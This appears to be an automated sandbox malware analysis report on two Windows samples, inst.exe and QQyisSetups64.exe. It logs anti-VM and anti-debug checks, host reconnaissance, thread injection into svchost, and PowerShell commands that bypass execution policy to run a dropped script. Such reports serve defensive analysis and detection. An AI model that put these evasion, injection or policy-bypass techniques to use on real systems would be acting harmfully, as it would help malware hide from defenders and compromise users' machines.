Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,		15_2_00AC8A46
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,		16_2_00AC8A46

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_6C653FE4

15_2_6C653FE4

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID='Disk #0, Partition #1'} where ResultClass = Win32_DiskDrive
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID='Disk #0, Partition #1'} where ResultClass = Win32_DiskDrive
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='C:'} where ResultClass = Win32_DiskPartition
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='C:'} where ResultClass = Win32_DiskPartition
Source: C:\Users\user\Downloads\inst.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Source: C:\Users\user\Downloads\inst.exe	Code function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,	15_2_00AD88EB
Source: C:\Users\user\Downloads\inst.exe	Code function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,	15_2_00A84BD0
Source: C:\Users\user\Downloads\inst.exe	Code function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,	15_2_00AB67A4
Source: C:\Users\user\Downloads\inst.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	16_2_00AB67A4
Source: C:\Users\user\Downloads\inst.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	16_2_00AD88EB
Source: C:\Users\user\Downloads\inst.exe	Code function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,	16_2_00A84BD0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Window / User API: threadDelayed 847	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Window / User API: threadDelayed 3295	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Window / User API: threadDelayed 4873	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3699	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1225	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 359	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Window / User API: threadDelayed 5176	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Window / User API: threadDelayed 4759	Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-11792

Source: C:\Users\user\Downloads\inst.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll

Jump to dropped file

Source: C:\Users\user\Downloads\inst.exe

Evaded block: after key decision

graph_15-137848

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep			graph_6-48845
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_6-48844

Source: C:\Users\user\Downloads\inst.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_15-137322
Source: C:\Users\user\Downloads\inst.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\Downloads\inst.exe	API coverage: 9.0 %
Source: C:\Users\user\Downloads\inst.exe	API coverage: 0.6 %

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 8032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 7332	Thread sleep time: -847000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 6932	Thread sleep time: -32950s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 7332	Thread sleep time: -4873000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep count: 3699 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep count: 1225 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep count: 359 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe TID: 2760	Thread sleep time: -7764000s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe TID: 2760	Thread sleep time: -7138500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 516	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Downloads\inst.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Thread sleep count: Count: 3295 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Windows\SysWOW64 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	File Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation	Jump to behavior

Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACD292 _memset,FindFirstFileW,FindNextFileW,FindClose,	15_2_00ACD292
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	15_2_00ACD71E
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,	15_2_00ADD670
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00AD3FB0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C5EE2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	15_2_6C5EE2B7
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,	16_2_00ADD670
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	16_2_00ACD71E
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00AD3FB0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_037880F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

6_2_037880F0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03785430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,

6_2_03785430

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: !Datacenter without Hyper-V (core)
Source: inst[1].exe.3.dr	Binary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: without Hyper-V for WESS
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Datacenter without Hyper-V
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: !Enterprise without Hyper-V (core)
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Datacenter without Hyper-V (core)
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Standard without Hyper-V
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1517659324.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2576741188.000002945F259000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Enterprise without Hyper-V (core)
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pc91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C~
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Enterprise without Hyper-V
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Standard without Hyper-V (core)
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: HPC Edition without Hyper-V
Source: svchost.exe, 00000012.00000002.2572704397.0000029459A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: QQyisSetups64.exe, 00000006.00000002.2560049997.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	Binary or memory string: Hyper-V Server

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	API call chain: ExitProcess graph end node	graph_6-48401
Source: C:\Users\user\Downloads\inst.exe	API call chain: ExitProcess graph end node	graph_15-136382
Source: C:\Users\user\Downloads\inst.exe	API call chain: ExitProcess graph end node	graph_15-137603

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_1001124D

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00A79CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,

15_2_00A79CD0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_0379054D VirtualProtect ?,-00000001,00000104,?

6_2_0379054D

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,

3_2_10001170

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02860AE4 mov eax, dword ptr fs:[00000030h]	3_2_02860AE4
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02880AE4 mov eax, dword ptr fs:[00000030h]	6_2_02880AE4
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_036000CD mov eax, dword ptr fs:[00000030h]	6_2_036000CD

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03786790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,

6_2_03786790

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1001154A
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1001124D
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02871224 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_02871224
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02871521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02871521
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02871520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02871520
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0378DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,	6_2_0378DF10
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0378F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0378F00A
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03791F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_03791F67
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C86815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_02C86815
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C88587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_02C88587
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00AF4647
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00AF116F
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF18F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00AF18F6
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AFA44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00AFA44A
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C68E1EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_6C68E1EA
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C694ACA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_6C694ACA
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00AF4647
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00AF116F
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF18F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00AF18F6

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_037877E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,

6_2_037877E0

Contains functionality to inject threads in other processes

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

6_2_037877E0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe		6_2_037877E0
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe		6_2_037877E0

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Process created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr	Binary or memory string: gShell_traywnd.
Source: QQyisSetups64.exe, 00000006.00000002.2579881406.0000000004845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .168.2.7 0 min210979Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: inst.exe	Binary or memory string: Shell_traywnd

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00A765C0 cpuid

15_2_00A765C0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,	6_2_03785430
Source: C:\Users\user\Downloads\inst.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_00B07AB2
Source: C:\Users\user\Downloads\inst.exe	Code function: GetLocaleInfoA,	15_2_00B1C813
